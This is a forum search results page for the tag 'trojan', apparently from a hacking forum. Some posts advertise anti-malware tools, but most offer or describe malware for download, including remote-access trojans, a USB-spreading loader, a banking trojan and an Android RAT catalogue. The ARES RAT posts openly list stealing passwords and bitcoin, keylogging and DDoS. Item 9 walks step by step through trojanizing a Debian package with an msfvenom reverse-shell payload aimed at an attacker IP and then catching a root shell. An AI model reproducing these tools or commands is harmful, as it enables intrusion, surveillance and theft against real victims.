Search the Community

Showing results for tags 'trojan'.

The search index is currently processing. Current results may not be complete.


More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Staff Control
    • Staff Announcements
    • Moderators
    • Administration
  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Cracking Zone
  • Security & Anonymity
  • Operating Systems | Hardware | Programs
  • Graphic Design
  • vBCms Comments
  • live stream tv
  • Marketplace
  • Premium Accounts
  • Modders Section
  • PRIV8-Section
  • Cracking Zone PRIV8
  • Carding Zone PRIV8

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me


Location


Interests


Occupation


TeamViewer


Twitter


Facebook


Youtube


Google+


Tox

Found 34 results

  1. Trojan Killer is the effective anti-malware tool for your memory stick. Be sure that you're safe from the internet threats wherever you go! ADVANTAGES OF GRIDINSOFT TROJAN KILLER WITH TROJAN KILLER PORTABLE YOU'RE ABLE TO CURE WITHOUT LIMITATIONS UNLIMITED ACTIVATIONS WITH TROJAN KILLER PORTABLE YOU'RE ABLE TO CURE ALL PCs AROUND YOU WITHOUT LIMITATIONS KEEPING ANTI-MALWARE SCANNER ON YOUR MEMORY STICK PORTABLE KEEPING ANTI-MALWARE SCANNER ON YOUR MEMORY STICK HELPS YOU TO SAVE THE PLACE FOR SOMETHING IMPORTANT ENJOY SIMPLE USER-FRIENDLY INTERFACE EASIER THAN EVER ENJOY SIMPLE USER-FRIENDLY INTERFACE: NOTHING IS LACKING, AND NOTHING IS SUPERFLUOUS [Hidden Content] [Hidden Content]
  2. Loaris Trojan Remover es una solución potente y sencilla para la eliminación de malware y la limpieza de su computadora de formas contemporáneas de amenazas de seguridad en línea. Si piensa que su sistema funciona extremadamente lento y ya no puede utilizar sus recursos completamente, es probablemente un buen momento para escanear su sistema con nuestra herramienta recomendada de eliminación de malware. El programa identificará rápidamente todos los posibles virus, troyanos, gusanos, adware, spyware y otras formas de infecciones. Escanee su sistema con nuestro programa anti-spyware para deshacerse completamente de todo tipo de troyanos en su computadora. Las soluciones antimalware ofrecidas por Loaris superarán sus expectativas, y verá lo que significa tener su computadora protegida por un software de seguridad confiable. Loaris ofrece una excelente solución antimalware para hacer frente a diversas amenazas cibernéticas en los casos en que el software de seguridad disponible no es eficaz para identificarlos o eliminarlos. Permita que Loaris Trojan Remover se encargue de la protección de su PC con Windows. [Hidden Content] [HIDE][Hidden Content]]
  3. dEEpEst

    USB Trojan

    USB Trojan Super simple loader that spreads over removable drives (USB flash drives, portable and network drives, SD cards). Features You can add the HWID of your PC to the black list and trojan will ignore it You can add any payload (executable file) Slient work Structure of the program Program.cs - Main part of the program HWID.cs - HWID generator Config.cs - Configuration file Shortcut.cs - This class creates shortcuts Tools.cs - Tools for trojan (net utils, and your payload) USB.cs - Infects disks and manages files Build Open Config.cs and edit HWID settings. Open Tools.cs, go to 50 line and modify RunPayload(object) method. Use Visual Studio 2015 or 2017 to build this project. Warning! This program may break your system or someone else's, be careful! Use VirtualBox and disable all external devices to test the program. I do not bear any material or moral responsibility. The software is provided as-is and is under development. Download: [HIDE][Hidden Content]]
  4. Loaris Trojan Remover es una solución potente y sencilla para la eliminación de malware y la limpieza de su computadora de formas contemporáneas de amenazas de seguridad en línea. Si piensa que su sistema funciona extremadamente lento y ya no puede utilizar sus recursos completamente, es probablemente un buen momento para escanear su sistema con nuestra herramienta recomendada de eliminación de malware. El programa identificará rápidamente todos los posibles virus, troyanos, gusanos, adware, spyware y otras formas de infecciones. Escanee su sistema con nuestro programa anti-spyware para deshacerse completamente de todo tipo de troyanos en su computadora. Las soluciones antimalware ofrecidas por Loaris superarán sus expectativas, y verá lo que significa tener su computadora protegida por un software de seguridad confiable. Descargar Loaris Trojan Remover ahora! Loaris ofrece una excelente solución antimalware para hacer frente a diversas amenazas cibernéticas en los casos en que el software de seguridad disponible no es eficaz para identificarlos o eliminarlos. Permita que Loaris Trojan Remover se encargue de la protección de su PC con Windows. [Hidden Content] [Hidden Content]
  5. Dentro del temido mundo de los virus unos de los más odiados son los famosos troyanos. Por ello, es normal que hoy en día se creen antivirus específicamente diseñados para detectar y eliminar los troyanos que se te hayan colado en tu ordenador, como es el caso de este Loaris Trojan Remover. Loaris Trojan Remover chequea todo el disco duro de tu ordenador, así como el arranque del sistema de Windows, en busca de toda clase de troyanos, adware, spyware, spybot y demás virus parasitarios que están hibernando para robarte información de tu PC. De esta manera, al menos con Loaris Trojan Remover tu ordenador, y la información que contiene, estarán un poco más a salvo y protegidos. [Hidden Content] [Hidden Content]
  6. Saefko Attack Systems the most advance RAT-BOT-AGENT ever created This is "a multi protocol multi operating system" remote administration tool , This is the first system to use three protocols establishing all time communication , there is four main thing this design provides that no other system provide first Unlimited number of machines to control. Extreme reliability. Android and Windows control at the same time. No port forwarding. No mysql. This project was designed to replace all RAT/BOTS that are made to control remote machine,the problem with all current RATS/BOTS that they are unreliable and limited , you cant in 99.9% of the time have more than 100 machine or victim due to self flooding , self flooding meaning when the client connect to the server directly "when the rat connect to the attacker pc through TCP" . When the number of connected clients increased this acte as flood attack, so you will be limited to some low number and you will end up with lagy unreliable connection to the target machines. That's from the side of TCP rats the other side is the http bots ,that use a remote server containing some php scripts and mysql server , this design can handle unlimited number of machines in theory , but the problem with this design is that you do not have a direct connection to the machine so you are limited to http tasks and this dose not give you much control so that was just a quick short overview on some of extreme problems that RATS/BOTS facing with current techs,in Saefko Attack Systems "SAS" you combining both of these types of connections and adding IRC Protocol to the mix you will end up with extremely reliable connection to the target machine,SAS will handle millions of connections with direct TCP communications established through IRC networks any time any place all wither. Fast Setup Youtube : Main Windows Public HTTP Tasks Windows Build Android Build Command And Control Sections Android Command And Control Sections Android IRC Commands ANDROID COMMANDS [msg] Show toast message. [dexe] Download and execute a file in visible mode eg : 'dexe [Hidden Content]'. [hdexe] Download and execute a file in hidden mode eg : 'dexe [Hidden Content]'. [vistpage] Vist a webpage in visible mode eg : 'vistpage [Hidden Content]'. [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage [Hidden Content]'. [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'. [ping] Ping the agent machine to check if still active. [location] Get geo location information based on 'ipinfo.com'. [flashon] Turn the dvice flash on. [flashoff] Turn the dvice flash on. [wakeup] Turn dvice screen on. [screenshot] Take a screenshot to from the target machine. GENERAL COMMANDS [clear] Clear the terminal. [opacity] Change the transparency of the terminal eg : 'opacity 0.4'. [myip] Show your public ip address that currently in use. [showtcpport] Show the public port used for TCP communications. [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'. [ping] Ping the agent machine to check if still active. [info] Tells the agent to identify its machine and return short informations about it. [CTRL + C] CTRL + C to cancel any previous commands. [flashoff] Turn the dvice flash on. [cleanup] Close all windows that created by this control uint. [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected. [exit] Close the current agent window. Android TCP Commands Android Private HTTP Tasks HTTP Tasks Types Download And execute Show Message Box Visit Website Shell Commands Now Windows Command And Control Windows IRC Commands WINDOWS COMMANDS [pwd] Show current directory. [screenshot] Take a screenshot to from the target machine. [opencd] Open cd rom. [closecd] Close cd rom. [ping] Ping the agent machine to check if still active. [camlist] Get a list of available camera devices. [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'. [location] Get geo location information based on 'ipinfo.com'. [opencd] Open cd rom. [keylogs] Get agent saved keylogs through HTTP drop point. [shell] Run shell commands. [dexe] Download and execute a file in visible mode eg : 'dexe [Hidden Content]'. [hdexe] Download and execute a file in hidden mode eg : 'dexe [Hidden Content]'. [vistpage] Vist a webpage in visible mode eg : 'vistpage [Hidden Content]'. [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage [Hidden Content]'. [uninstall] Uninstall the agent completely from the target machine. GENERAL COMMANDS [clear] Clear the terminal. [opacity] Change the transparency of the terminal eg : 'opacity 0.4'. [myip] Show your public ip address that currently in use. [showtcpport] Show the public port used for TCP communications. [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'. [ping] Ping the agent machine to check if still active. [info] Tells the agent to identify its machine and return short informations about it. [CTRL + C] CTRL + C to cancel any previous commands. [flashoff] Turn the dvice flash on. [cleanup] Close all windows that created by this control uint. [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected. [exit] Close the current agent window. Windows TCP Commands Windows Private HTTP Tasks HTTP Tasks Types Download And execute Show Message Box Visit Website Shell Commands Download: [Hidden Content]
  7. dEEpEst

    ARES RAT v2.4.2

    This program has been created by dEEpEst --- RELEASES VERSION --- This version is version 2.4.2 has just been born --- DESCRIPTION --- This software is a remote administration tool --- LINKS --- [Hidden Content] [Hidden Content]/hackers/topic/44370-ares-rat-v100 [Hidden Content]/hackers/topic/44869-ares-rat-v121 [Hidden Content]/hackers/topic/46961-ares-rat-v200 [Hidden Content]/hackers/topic/47882-ares-rat-v242 In contruccioon .... --- TUTORIALS AND MANUALS --- [Hidden Content] [Hidden Content] [Hidden Content] In contruccioon .... --- AUTHORS --- [Hidden Content]/hackers/profile/1-deepest/ --- DONATE --- You can always help us by sending any amount to one of these accounts [Hidden Content]/hackers/clients/donations/ In contruccioon .... --- COPYRIGHT --- Its free distribution is allowed as long as the credits and links are respected --- UPDATE VERSION --- ARES RAT v2.4.2 --- WHAT'S NEW IN THIS VERSION --- RDP Native Fixed minor problems in client //:::::::::::::::::::::::::::::::::::::::::::::::::::// --- UPDATE VERSION --- ARES RAT v2.0.0 --- WHAT'S NEW IN THIS VERSION --- Proxy Reverse Checked Proxy It was repaired sight flags by countries Was added "sqlite3" missing library Was added two styles darks //:::::::::::::::::::::::::::::::::::::::::::::::::::// --- UPDATE VERSION --- ARES RAT v1.2.1 --- WHAT'S NEW IN THIS VERSION --- Was added missing style library Changed target platform in ATENEA.exe (server) for NET. Framework 2.0 It was repaired active firewall tester //:::::::::::::::::::::::::::::::::::::::::::::::::::// --- TITLE & VERSION --- ARES RAT v1.0.0 --- DESCRIPTION --- ARES RAT is a remote administration tool. We can remotely control other computers millions of kilometers away. Things like viewing files, downloading them, changing registers, running programs, watching webcam, stealing BTC, stealing passwords, registering keystrokes, launching Ddos attacks, and many other things. --- FEATURES --- File Manager Remote Desktop Remote Cam Remote Shell Process Manager Run File from Disck Run File from Link Regedit Start Process Stop Process Run Script Notify Chat Keylooger Get Password Stealer Bitcoin DDos Atack Bypass UAC Disable/Enable Windows OFF Shutdown Restart IExplorer Home Page Windows Update ON/OFF Desktop Icons Show/Hide Taskbar Show/Hide Sound Mute/UnMute Sound Beep Speak Computer Play Music Hidden Error Sound CMD Enable/Disable CD Open/Close Clock Show/Hide Keyboard Block/UnBlock Mouse Reverse/Normal Cursor Show/Hide Monitor Turn Off/On Task Manager Enable/Disable Registry Enable/Disable System Restore Enable/Disable Open Website Get ClipBoard Copi IP User Info Computer Info Server Rename Server Update Server Closed/Restart Server Uninstall Extras Port Listen Password Lenguage (Only English) Change Styles Port Scanner IP Grabber Spoofer No-IP Binder Mutex Persistence Hide After Run Melt After Run Startup Copy folder temp Directory server Install Server folders Injection Svchost Antis Spread USB Block VirusTotal Change Icon Logs --- DISCLAIMERS --- You can use and distribute this tool freely, keep in mind that this tool is designed for student use and that you are responsible for the misuse that could be given. --- BUGS --- All the bugs can be repeated anywhere in the "About" tab, and I will try to correct it as soon as possible. --- PERSONAL NOTE --- For a long life for this warrior! Happy hacking! Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  8. WeDefend - Check Proccess and Network Activity to against Remote Access Trojan WeDefend is application based on java programming language with several features as check proccess activity, network activity, file encryption, disk hider and folder lock to against and also protect user data from Remote Access Trojan malware in Windows operating system. Video: [Hidden Content] Download: [Hidden Content]
  9. dEEpEst

    Binary Linux Trojan

    In order to demonstrate that client side attacks and trojans are not exclusive to the Windows world, we will package a Metasploit payload in with an Ubuntu deb package to give us a shell on Linux. We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package freesweep, a text-based version of Mine Sweeper. [email protected]:~# apt-get --download-only install freesweep Reading package lists... Done Building dependency tree Reading state information... Done ...snip... [email protected]:~# mkdir /tmp/evil [email protected]:~# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil [email protected]:~# cd /tmp/evil/ [email protected]:/tmp/evil# Next, we need to extract the package to a working directory and create a DEBIAN directory to hold our additional added “features”. [email protected]:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work [email protected]:/tmp/evil# mkdir work/DEBIAN In the DEBIAN directory, create a file named control that contains the following: [email protected]:/tmp/evil/work/DEBIAN# cat control Package: freesweep Version: 0.90-1 Section: Games and Amusement Priority: optional Architecture: i386 Maintainer: Ubuntu MOTU Developers ([email protected]) Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use. We also need to create a post-installation script that will execute our binary. In our DEBIAN directory, we’ll create a file named postinst that contains the following: [email protected]:/tmp/evil/work/DEBIAN# cat postinst #!/bin/sh sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep & Now we’ll create our malicious payload. We’ll be creating a reverse shell to connect back to us named ‘freesweep_scores’. [email protected]:~# msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 -b "\x00" -f elf -o /tmp/evil/work/usr/games/freesweep_scores Found 10 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 98 (iteration=0) x86/shikata_ga_nai chosen with final size 98 Payload size: 98 bytes Saved as: /tmp/evil/work/usr/games/freesweep_scores We’ll now make our post-installation script executable and build our new package. The built file will be named work.deb so we will want to change that to freesweep.deb and copy the package to our webroot directory. [email protected]:/tmp/evil/work/DEBIAN# chmod 755 postinst [email protected]:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'. [email protected]:/tmp/evil# mv work.deb freesweep.deb [email protected]:/tmp/evil# cp freesweep.deb /var/www/ If it is not already running, we’ll need to start the Apache web server. [email protected]:/tmp/evil# service apache2 start We will need to set up the Metasploit multi/handler to receive the incoming connection. [email protected]:~# msfconsole -q -x "use exploit/multi/handler;set PAYLOAD linux/x86/shell/reverse_tcp; set LHOST 192.168.1.101; set LPORT 443; run; exit -y" PAYLOAD => linux/x86/shell/reverse_tcp LHOST => 192.168.1.101 LPORT => 443 [*] Started reverse handler on 192.168.1.101:443 [*] Starting the payload handler... On our Ubuntu victim, we have somehow convinced the user to download and install our awesome new game. [email protected]:~$ wget [Hidden Content] [email protected]:~$ sudo dpkg -i freesweep.deb As the victim installs and plays our game, we have received a shell! [*] Sending stage (36 bytes) [*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129) ifconfig eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6 inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:49 errors:0 dropped:0 overruns:0 frame:0 TX packets:51 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB) Interrupt:17 Base address:0x1400 ...snip... hostname ubuntu id uid=0(root) gid=0(root) groups=0(root) Source: [HIDE][Hidden Content]]
  10. TL-TROJAN Welcome to the TL-TROJAN repo. This collection contains source files for a variety of Trojans. Files in this collection have been gathered via distributed trawling of the internet, and deduplicated where applicable. [Hidden Content]
  11. Remote Access Tool Trojan List - Android Github: [Hidden Content] This repo contents all RAT trojan android as I know so far (free or paid app) with permission and feature used list for my documentation. Looking for free port forwarding without buy VPN or Router setting?? Use Ngrok DroidJack [Hidden Content] Camera Storage SMS CALL Whatsapp Reader Contact Browser History App Manager GPS Location Microphone AndroRAT [Hidden Content] Get contacts (and all theirs informations) Get call logs Get all messages Location by GPS/Network Monitoring received messages in live Monitoring phone state in live (call received, call sent, call missed..) Take a picture from the camera Stream sound from microphone (or other sources..) Streaming video (for activity based client only) Do a toast Send a text message Give call Open an URL in the default browser Do vibrate the phone SpyNote Bind your server APK with any other Game or App. Explore Files with full access. Read/Write Messages. Make a call, record a call and browse call logs. Read and write contact list. Capture photos and videos. Listen live conversation through mic, record mic sound live. Check browser history. Get GPS Location. Check installed apps. Get phone’s information (IMEI, WIFI MAC, PHONE CARRIER). Fun Panel (Show messages, shake the phone etc) AhMyth [Hidden Content] Camera Storage Microphone Location Contact Message Call Logs TheFatRAT [Hidden Content] execute command getuid process lost sysinfo record microphone camera snap, stream, list BetterAndroRAT [Hidden Content] Remote Update & Install Application Remote WebCam Remote Microphone Record Remote File Management Remote Call & SMS Remote Device Controller UnknownRAT Storage access Android Tools such, take photo, screenshot etc Record audio android_trojan / Android Trojan [Hidden Content] shell command upload file sms dump download restart location info record mic stream sync file clear and quit storage call log history contact OmniRAT Fully Remote Access Activity Information File Manager App Widgets Audio Information Battery Information Bluetooth Information Call Information Camera Information Configuration Information Connectivity Information Contacts Information, Device admin Information Display Information Installed Apps Information Location Information Memory Information APK Installer Call & SMS Surveillance and many more Android Voyage Remote Android Screen Screenshot Keylogger Traffic Monitor Make as system application Lock and unlock application Hide and unhide application Remove android password Message Access Bricks the device, Anti Antivirus Self Destructive Mode Password Grabbers NetWire camera audio keylogger storage download upload location etc rdroid [Hidden Content] Contact System App Storage Call Message Shell LokiDroid Call Contact Message Storage Location App KevDroid Installed applications Phone number Phone Unique ID Location (the application tries to switch on the GPS), this information is collected every 10 seconds, which is aggressive for this kind of spying tool Stored contacts information (name, phone numbers, emails, photos, etc.) Stored SMS Call logs Stored emails Photos Recording calls columbus-trojan [Hidden Content] (cute trojan) Image (front-facing camera) 10-second sound clip (microphone) Location (mobile triangulation) GhostCtrl Admin Voice record Message Location Pupy [Hidden Content] Text to speech for Android to say stuff out loud webcam snapshots (front cam & back cam) GPS tracker ! TeleRAT and IIRAT (Telegram BOT) Contact Clipboard App list Camera SMS Storage Control Admin Screen Microphone Vibrate Hidden Cobra Proxy Contact SMS Payload Dendroid [Hidden Content] Deleting call logs Opening web pages Dialing any number Recording calls SMS intercepting Uploading images and video Opening an application Performing denial-of-service attacks Changing the command and control server Casperspy [Hidden Content] Similar with dendroid Actually Botnet by dendroid SMS Camera Mic Storage Browser open page Joanap Mic botnet steal log SHConnect [Hidden Content] Camera Location Storage HighRise Incoming outgoing SMS LaRAT [Hidden Content] Get messages Screenshot Functionality Camera Access Add Google form for passwords Triout Framework Record phonecall, save it, send it to C&C SMS Logs Call Logs Steal Images or Video, Camera Access Hide Cerberusapp [Hidden Content] Storage Location Camera Admin notdeleteable more Pegasus Storage Mic Screenshot Calender Instant Messaging Contact & Call & SMS & Mail Browser History Device Setting Location Adobot [Hidden Content] Realtime command execution Schedule commands Hidden app icon (stealth mode) Fetch SMS in Fetch call logs Fetch contacts Send SMS command Forward received/sent SMS etc Adroid Spy App [Hidden Content] Contact Logs SMS Location Photos Etc SpyApp Client [Hidden Content] Notification Listener (Facebook, whatsapp, email, instagram etc) Call Logs Contact SMS Etc i-spy Android [Hidden Content] Camera Location Storage Etc FinSpy Storage Phone information Call Sms Mms Contact GPS Location Voip record such Skype, WeChat, Viber, LINE etc Monokle GPS location Audio record, call record Screen recording Keylogger and fingerprint-device duplicate History browser and Call log, SMS Email logs, create a Call and SMS Contact and calender Shell as root (rooted/rootable) Cerberus Banking Bots Bank and CC Logs information Mail logs SMS, Call (+Forward), Contact, GPS, Audio Monitoring all activity / logs Push to turnoff Play Protected (Disable) Download, Install, Remove Apps Lock device
  12. dEEpEst

    Proxy Trojan

    [Hidden Content]
  13. Loaris trojan remover license key is a powerful software for cleaning your computer from malware, Viruses and any malicious threat that may damage your system. Loaris trojan remover license key is a powerful tool for removing all kind of malware, worms, spyware, and adware. It looks great as a complement to the security package. Many trojans, while updating the system to the latest version, still being ignored by system security and causing damage to the system. Loaris trojan remover With Lifetime License features: • Protecting the system against malicious websites • Avoid displaying annoying ads through popups and malware • Quick detection and unique features to destroy it • Browser protection to prevent unauthorized plugins installation • Possibility to use it as a complement to other security packages • Deal with a variety of malicious code on the web • Quickly detect malware and stop them instantly • Avoid stealing passwords • Checking the connected memory and cleaning them • And many more. [Hidden Content]
  14. dEEpEst

    Tinba Banking Trojan (Panel + Source)

    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  15. dEEpEst

    USB Trojan

    USB Trojan Super simple loader that spreads over removable drives (USB flash drives, portable and network drives, SD cards). Features You can add the HWID of your PC to the black list and trojan will ignore it You can add any payload (executable file) Slient work Structure of the program Program.cs - Main part of the program HWID.cs - HWID generator Config.cs - Configuration file Shortcut.cs - This class creates shortcuts Tools.cs - Tools for trojan (net utils, and your payload) USB.cs - Infects disks and manages files Build Open Config.cs and edit HWID settings. Open Tools.cs, go to 50 line and modify RunPayload(object) method. Use Visual Studio 2015 or 2017 to build this project. Warning! This program may break your system or someone else's, be careful! Use VirtualBox and disable all external devices to test the program. I do not bear any material or moral responsibility. The software is provided as-is and is under development. Download: [Hidden Content]
  16. This program has been created by dEEpEst --- RELEASES VERSION --- This version is version 1.0.0 has just been born --- DESCRIPTION --- This software is a remote administration tool --- LINKS --- [Hidden Content] In contruccioon .... --- TUTORIALS AND MANUALS --- [Hidden Content] In contruccioon .... --- AUTHORS --- [Hidden Content]/hackers/profile/1-deepest/ --- DONATE --- You can always help us by sending any amount to one of these accounts In contruccioon .... --- COPYRIGHT --- Its free distribution is allowed as long as the credits and links are respected --- TITLE & VERSION --- ARES RAT v1.0.0 --- DESCRIPTION --- ARES RAT is a remote administration tool. We can remotely control other computers millions of kilometers away. Things like viewing files, downloading them, changing registers, running programs, watching webcam, stealing BTC, stealing passwords, registering keystrokes, launching Ddos attacks, and many other things. --- FEATURES --- File Manager Remote Desktop Remote Cam Remote Shell Process Manager Run File from Disck Run File from Link Regedit Start Process Stop Process Run Script Notify Chat Keylooger Get Password Stealer Bitcoin DDos Atack Bypass UAC Disable/Enable Windows OFF Shutdown Restart IExplorer Home Page Windows Update ON/OFF Desktop Icons Show/Hide Taskbar Show/Hide Sound Mute/UnMute Sound Beep Speak Computer Play Music Hidden Error Sound CMD Enable/Disable CD Open/Close Clock Show/Hide Keyboard Block/UnBlock Mouse Reverse/Normal Cursor Show/Hide Monitor Turn Off/On Task Manager Enable/Disable Registry Enable/Disable System Restore Enable/Disable Open Website Get ClipBoard Copi IP User Info Computer Info Server Rename Server Update Server Closed/Restart Server Uninstall Extras Port Listen Password Lenguage (Only English) Change Styles Port Scanner IP Grabber Spoofer No-IP Binder Mutex Persistence Hide After Run Melt After Run Startup Copy folder temp Directory server Install Server folders Injection Svchost Antis Spread USB Block VirusTotal Change Icon Logs --- DISCLAIMERS --- You can use and distribute this tool freely, keep in mind that this tool is designed for student use and that you are responsible for the misuse that could be given. --- BUGS --- All the bugs can be repeated anywhere in the "About" tab, and I will try to correct it as soon as possible. --- PERSONAL NOTE --- For a long life for this warrior! Happy hacking! Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  17. This program has been created by dEEpEst --- RELEASES VERSION --- This version is version 1.2.1 has just been born --- DESCRIPTION --- This software is a remote administration tool --- LINKS --- [Hidden Content] [Hidden Content]/hackers/topic/44370-ares-rat-v100/ In contruccioon .... --- TUTORIALS AND MANUALS --- [Hidden Content] [Hidden Content] In contruccioon .... --- AUTHORS --- [Hidden Content]/hackers/profile/1-deepest/ --- DONATE --- You can always help us by sending any amount to one of these accounts [Hidden Content]/hackers/clients/donations/ In contruccioon .... --- COPYRIGHT --- Its free distribution is allowed as long as the credits and links are respected --- UPDATE VERSION --- ARES RAT v1.2.1 --- WHAT'S NEW IN THIS VERSION --- Add missing style library Changed target platform in ATENEA.exe (server) for NET. Framework 2.0 Repair active firewall tester //:::::::::::::::::::::::::::::::::::::::::::::::::::// --- TITLE & VERSION --- ARES RAT v1.0.0 --- DESCRIPTION --- ARES RAT is a remote administration tool. We can remotely control other computers millions of kilometers away. Things like viewing files, downloading them, changing registers, running programs, watching webcam, stealing BTC, stealing passwords, registering keystrokes, launching Ddos attacks, and many other things. --- FEATURES --- File Manager Remote Desktop Remote Cam Remote Shell Process Manager Run File from Disck Run File from Link Regedit Start Process Stop Process Run Script Notify Chat Keylooger Get Password Stealer Bitcoin DDos Atack Bypass UAC Disable/Enable Windows OFF Shutdown Restart IExplorer Home Page Windows Update ON/OFF Desktop Icons Show/Hide Taskbar Show/Hide Sound Mute/UnMute Sound Beep Speak Computer Play Music Hidden Error Sound CMD Enable/Disable CD Open/Close Clock Show/Hide Keyboard Block/UnBlock Mouse Reverse/Normal Cursor Show/Hide Monitor Turn Off/On Task Manager Enable/Disable Registry Enable/Disable System Restore Enable/Disable Open Website Get ClipBoard Copi IP User Info Computer Info Server Rename Server Update Server Closed/Restart Server Uninstall Extras Port Listen Password Lenguage (Only English) Change Styles Port Scanner IP Grabber Spoofer No-IP Binder Mutex Persistence Hide After Run Melt After Run Startup Copy folder temp Directory server Install Server folders Injection Svchost Antis Spread USB Block VirusTotal Change Icon Logs --- DISCLAIMERS --- You can use and distribute this tool freely, keep in mind that this tool is designed for student use and that you are responsible for the misuse that could be given. --- BUGS --- All the bugs can be repeated anywhere in the "About" tab, and I will try to correct it as soon as possible. --- PERSONAL NOTE --- For a long life for this warrior! Happy hacking! Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  18. JÁ OLHEI SPYNOTE, E AGORA ESTOU NO AHMYTH, INSTALEI O JAVA SE DEVELOPMENT KIT 8u201 E NÃO DEU CERTO AGORA TO INSTALANDO O 202, VAMOS VER SE DAR CERTO POREM JÁ VI ALGUNS COMENTARIOS QUE MESMO BAIXANDO O 202 ESTÁ DANDO O ERRO DE "Building Failed" QUEM PUDER ME AJUDAR NESSA SOLUÇÃO OU EM OUTRO TROJAN PARA MESMA UTILIDADE EU AGRADEÇO VAAALEU !! quem tem kl remota me chama no imbox ?
  19. QUEM PUDER ME AJUDA MANDA UMA MENSAGEM NO MEU E-MAIL QUANTA ANTES POR FAVOR !!!!
  20. dEEpEst

    USB Trojan

    USB Trojan Super simple loader that spreads over removable drives (USB flash drives, portable and network drives, SD cards). Features You can add the HWID of your PC to the black list and trojan will ignore it You can add any payload (executable file) Slient work Structure of the program Program.cs - Main part of the program HWID.cs - HWID generator Config.cs - Configuration file Shortcut.cs - This class creates shortcuts Tools.cs - Tools for trojan (net utils, and your payload) USB.cs - Infects disks and manages files Build Open Config.cs and edit HWID settings. Open Tools.cs, go to 50 line and modify RunPayload(object) method. Use Visual Studio 2015 or 2017 to build this project Download: [HIDE]. [Hidden Content]]
  21. dEEpEst

    Proxy Trojan

    [Hidden Content]
  22. Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  23. To remove a Trojan, Virus, Worm, or other Malware from Windows, follow these steps: [Hidden Content]
  24. hola amigos del foro alguno experto en el tema me puede decir cual troyano esta actualisado que tenga buena conecsion
  25. dEEpEst

    RAT via Telegram (Python 2.7)

    RAT-via-Telegram Windows Remote Administration Tool via Telegram (Python 2.7) | Originally created by Ritiek Why another one? The current Remote Administration Tools in the market face 2 major problems: Lack of encryption. Require port forwarding in order to control from hundreds of miles. This RAT overcomes both these issues by using the Telegram bot API. Fully encrypted. The data being exchanged cannot be spied upon using MITM tools. Telegram messenger app provides a simple way to communicate to the target without configuring port forward before hand on the target. Features: Keylogger with window title log included Get target PC's Windows version, processor and more Get target PC's IP address information and approximate location on map Delete, Move files Show current directory Change current directory List current or specified directory Download any file from the target Upload local files to the target. Send your image, pdf, exe or anything as file to the Telegram bot Autostart playing a video in fullscreen and no controls for a youtube video on target Take Screenshots Execute any file Access to microphone Start HTTP Proxy Server Freeze target's keyboard Schedule tasks to run at specified datetime Encode/Decode all local files Ping targets Update .exe -- thanks LearnerZone Self-Destruct RAT Change wallpaper from file or url Execute arbitrary python 2.7 on the go Execute cmd shell [TODO] Browser (IE, Firefox, Chrome) cookies retrieval [TODO] Password retrieval [TODO] Monitor web traffic (graphically?) [TODO] Fine-tuning scripting (i.e.: if app x is opened y is executed) [TODO] Freeze target's mouse [TODO] Capture clipboard (Text, Image) [TODO] Hide desktop icons [TODO] Take snapshots from the webcam (if attached) [TODO] Audio compression Thanks Dviros: Chrome login/password retrieval Display ARP table Get active processes and services Shutdown/Reboot computer Display DNS Cache & More coming soon! Screenshots: Installation & Usage: Clone this repository. Set up a new Telegram bot talking to the BotFather. Copy this token and replace it in the beginning of the script. Install the dependencies: pip install -r requirements.txt. Install pyHook 64-bit or 32-bit depending on your system. For 64-bit- pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl. For 32-bit- pip install pyHook-1.5.1-cp27-cp27m-win32.whl. To run the script: python RATAttack.py. Find your bot on telegram and send some command to the bot to test it. To restrict the bot so that it responds only to you, note down your chat_id from the console and replace it in the script and comment out the line return True. Don't worry, you'll know when you read the comments in the script. - A folder named `RATAttack` will be created in your working directory containing `keylogs.txt` and any files you upload to the bot. Commands: When using the below commands; use / as a prefix. For example: /pc_info. arp - display arp table capture_pc - screenshot PC cmd_exec - execute shell command cp - copy files cd - change current directory delete - delete a file/folder download - download file from target decode_all - decode ALL encoded local files dns - display DNS Cache encode_all - encode ALL local files freeze_keyboard - enable keyboard freeze unfreeze_keyboard - disable keyboard freeze get_chrome - Get Google 